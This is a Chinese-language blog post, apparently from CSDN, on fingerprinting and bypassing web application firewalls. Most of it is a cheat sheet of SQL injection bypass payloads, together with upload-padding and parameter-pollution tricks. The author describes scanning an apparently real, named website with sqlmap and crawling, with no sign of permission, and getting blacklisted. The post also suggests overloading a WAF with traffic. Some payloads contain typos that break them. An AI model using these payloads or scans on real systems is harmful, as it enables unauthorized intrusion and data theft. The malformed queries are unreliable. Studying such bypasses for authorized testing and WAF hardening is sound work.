目录
一、触发WAF的情况
1.1、限速
扫描/访问的速度太快了,过快的进行扫描,不仅获得的信息是假的,还会被waf拦截。
1.2、指纹
waf都有指纹记录识别,,特别是awvs等一些热门工具的工具指纹。
1.3、关键字
漏洞payload的关键字也在waf的拦截字典里。
二、介绍:
在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。
网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。
需要手动进行WAF的绕过,而绕过WAF前肯定需要对WAF 的工作原理有一定的理解
三、WAF分类
3.1、非嵌入型WAF
非嵌入型WAF指的是硬件型WAF、云WAF、软件型WAF之类的,非嵌入型WAF对Web流量的解析完全是靠自身的,它的受攻击机面还涉及到其他层面
3.2、嵌入型WAF
嵌入型WAF指的是网站内置的WAF,嵌入型WAF拿到的Web数据是已经被解析加工好的,从Web容器模块型WAF、代码层WAF往下走,其对抗畸形报文、扫操作绕过的能力越来越强。当然,在部署维护成本方面,也是越高的。
四、WAF的判断
4.1、 方法一:手动测试
①最简单的SQL语句
and 1=1
and 1=2
②在域名后加上一个不存在的id参数,并且加上明显sql注入语句,查看服务器回显
4.2、 方法二:sqlmap进行测试
sqlmap -u 'http://www.xxxxx.com/index.html' --batch --random-agent
random-agent 是通过/usr/share/sqlmap/txt/user-agents.txt字典随机生成一个user-agent
对于这个网站我没检测出来是什么离大谱了
sqlmap -u 'http://www.shmds.com/index.html' --batch --random-agent --forms --crawl=2
还是没测出来,但是被拉黑了,说明是有waf
4.3、方法三:其他WAF工具
4.3.1、wafw00f(kali)
https://blog.csdn.net/qq_53079406/article/details/122961195?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165234124116780357243061%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165234124116780357243061&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-6-122961195-null-null.nonecase&utm_term=waf&spm=1018.2226.3001.4450
五、数据构造绕过
5.1、超过WAF配额绕过:
5.1.1、原理:
为不干扰到网站的正常运行,配置WAF检测额度内进行过滤,有些WAF就会设置如果数据包长度超过所检测的长度,就会对部分数据包或者是数据包的部分内容进行无检测“放行”。
5.1.2、方法一:增加参数个数
配置的原因,例如safedog,只会检测前100个参数,把自己的执行语句放在100个之后
5.1.3、方法二:增加参数长度
文件上传漏洞利用时,增加无意义数据,webshell放在最后面;SQL注入时,增加URL编码长度,并注释掉;xss测试时加入无意义内容
5.1.4、方法三:增加WAF负载
向WAF发送大量正常数据包,并发送异常数据包,导致站点流量过大,可能会对部分数据包进行检查,注意分寸,避免造成宕机。
5.2、异常数据包
5.2.1、双参数绕过:
网站有1个id参数,在数据包中包含2个id参数进去,waf可能只检查第一个,第二个就被服务器执行了。
5.2.2、请求方式转换:
根据对WAF配置的不同
如果WAF只检验GET类型的包,忽略POST类型的包,修改数据包类型尝试绕过
如果WAF只检验POST类型的包,忽略GET类型的包,修改数据包类型尝试绕过
有时,也可尝试,把数据包改为request类型等或根本就不存在的其他类型
5.3、构造匹配规则外数据:
5.3.1、大小写变换:
?id=-1' UnIOn SeLEct 1,VERsion(),3
5.3.2、常用字符替换:
greatest 替换 >
greatest返回两个值中大的那个
?id=-1' union select greatest(ascii(substr(database(),0,1)),1) --+
substr(string,b,c)-------->截取字符串string,从第b个开始,截取c个
least 替换 <
least返回两个值中小的那个
?id=-1' union select least(ascii(substr(database(),0,1)),1000000) --+
strcmp函数
比较两个值大小,相等返回0 后者比前者大返回-1 小返回1
?id=-1' union select srtcmp(ascii(substr(database(),0,1)),100) --+
in 替换 =
相等返回1 不相等返回 0
?id=-1' union select substr(database()) in ("u") --+
between and 替换 =
?id=-1' union select substr(database()) between "a" and "u" --+
form for
盲注过滤逗号
?id=-1' union select(database() form 0 for 1) --+
limit A offset B
当过滤逗号时,limit 后面只能有一个参数,表示要取的数量,offset 表示跳过数量
select * from users limit 3 offset 2
表示跳过前2个,取3个,即3,4,5
benchmark替换sleep
benchmark来测速,即执行select database() 5000次所需时间
benchmark(5000,(select database()))
hex() bin() 替换 ascii()
hex(substr(database(),0,1))=55
concat_ws替换group_concat
concat_ws(",",database(),version())
5.3.3、使用嵌套:
对某些关键字替换为空,尝试采用嵌套双写进行绕过
SELselectECT、UNunionION
5.3.4、双重编码:
WAF会解码后过滤
5.3.5、特殊符号:
+(-)(@)(!)等替代空格
select+database()
select@database()
xor逻辑异或
任意一个数为NULL时,返回NULL
非NULL的数,逻辑真假值相异,返回1,否则为0
database()="admin" xor 0
/**/ () %0a `` 2个空格 替代 空格
select/**/database()
替换and or not xor
and ----> && ,or ------> || ,xor ------> | ,not -----> !
替换=
like rlike
where id rlike 1
where id like "admin"
union all select
select password from users where id rlike 1 union all select version();
版本结合
版本小于50014
select /*!版本号(如50014) database()*/
注释符加换行绕过
select #a database()
selelct %23%0a database()
(%23表示注释 %0a表示换行)
空字节
有的过滤会碰到空字节会中止过滤
?id=1 a%00nd 1=2……
?id=1 %00 and 1=2……
http 参数污染
利用参数污染来导致网站和安全狗接受数据的不一致性,实现绕过的操作。当get方式进行传参时,经过&符号传入多个参数,WAF可能只检测第一个参数的值,然后台却检测最后一个传入的值,此时能够绕过WAF的防护
下图即每种服务器获得到的参数
?id=1/**&id=-1' union select 1,database(),3 #*/
安全狗收到的: 1/**&id=-1' union select 1,database(),3 #*/
被注释,没法执行,安全狗会忽略
网站收到的: -1' union select 1,database(),3 #*/
被带入执行
扫一扫
334
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
